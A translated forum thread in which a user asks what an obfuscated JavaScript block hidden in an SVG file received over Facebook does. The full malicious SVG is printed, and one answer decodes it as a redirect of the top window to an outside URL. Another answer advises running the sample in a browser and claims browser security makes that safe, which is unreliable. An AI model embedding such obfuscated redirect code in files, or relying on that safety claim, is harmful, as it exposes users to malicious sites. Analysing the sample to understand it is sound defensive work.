Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
P
P
pmozil2016-11-22 00:50:45
JavaScript
pmozil, 2016-11-22 00:50:45

Can you help me decipher the virus script that is hidden in the SVG image?

Received a message on Facebook with an attached picture "photo1323.svg" .
I downloaded, which means this image, and I think that this addressee may know about the scalable vector graphics markup language. And then I remember that SVG supports JavaScript, which is used to make animation.
I opened it in notepad and did not parse a single function and not a single parameter, as if it was somehow generated, and not written by a person.
Here is the script

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function vuoelw(buegk, npydu, qcpfy) {
for (var coicer = "RNc0gAnrjv:T.fB29yEad6C=zJ1VUHblu_/PohGYOSL4mX7I3iZeFs?tp85KDkMx", yfckcd = ["rFgU_p5MvhOb=JuozHiSxYm4kE8j1.36l7cDaLey9ns0V:TRfINtXZ\/K2PAd?CGB","mOL?_1HSVZeB7rNyYpR39ghb0C\/DcuEiX8:6f=s.G4JxIdPoTjUta5lkKnAMF2vz","GN3EmAoHVfMLFUT06v\/27aB9cugZPxJdKhr5SI1:Y?tz4ln8kRCbD.j_y=espXOi",":B7eDtUHjbCY1ILTM\/2PmhSuNc_lxJO4E.GosFdy0ag83k5zRp?rnv69VifZ=KAX",".0hbvERV6kyHS8_zlX=GBmtMZ5c?NYO9\/4LJFUon7spr3CiKeDagTdfj1P2Au:Ix"], whsht = "", xrjrt = 0; yfckcd[xrjrt];) xrjrt++;
for (var gkvyro = 0; buegk[gkvyro];) {
  for (var gnjnvt = 0, gnntty = -1; coicer[gnjnvt];) {
    if (coicer[gnjnvt] == buegk[gkvyro]) {
      gnntty = gnjnvt;
      break
    }
    gnjnvt++
  }
  if (gnntty >= 0) {
    for (var qcucm = 0, awducq = -1; yfckcd[gkvyro % xrjrt][qcucm];) {
      if (yfckcd[gkvyro % xrjrt][qcucm] == buegk[gkvyro]) {
        awducq = qcucm;
        break
      }
      qcucm++
    }
    whsht += coicer[awducq]
  } else whsht += buegk[gkvyro];
  gkvyro++
}
var hswos = "";
for (nfegz = npydu; nfegz < whsht.length; nfegz++) hswos += whsht[nfegz];
return whsht = hswos
}

  var ofqwly = window;
  var lmktar = vuoelw("kwfIjaK",4,true);
  var nzbeu = vuoelw("qjiq9aL29DaH",4,true);
  var ndgexl = vuoelw("JqmD85KbmRLfSwUMtU",14,true);
  ofqwly[lmktar][nzbeu][ndgexl] = vuoelw("2IcVUKkyCLcpRUdtwb1/Z:dshSkRsR=KIV",4,false);
  ]]></script>
</svg>

So the question is:
What does this script do?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
P
Peter, 2016-11-22
@pmozil

Pull out the script, paste it into a blank page or jsfiddle.net in Chrome
Add it to the first line debugger;
Open the developer console and execute command by command. It becomes clear how it works.
The browser's security policy will not allow code that is not safe to be executed.

Report
K
Kovalsky, 2016-11-22
@lazalu68

That's what he does
window.top.location.href = 'http://yinsewe.us/location.php';

The function performs some kind of complex decoding, I did not waste time on parsing. Any Daedric lmktar , nzbeu and ndgexl store top , location and href keys respectively

Similar questions
T
TaigaFox2022-01-08 20:57:27
Will the antivirus create a conflict? 4Reply
V
Valeriu Vodnicear2016-06-07 20:59:31
How to free port 80 so that OpenServer works? 3Reply
A
Azat Kiberov2021-03-20 17:56:44
How to send your request for a site with socket io through the browser? 2Reply
R
Romi2021-03-22 23:42:55
Is there an analogue of Macromedia/Adobe Fireworks in Ubuntu/Linux? 7Reply
A
Andrey Andreevich2022-01-15 12:43:59
How to compare two pictures pixel by pixel? 4Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question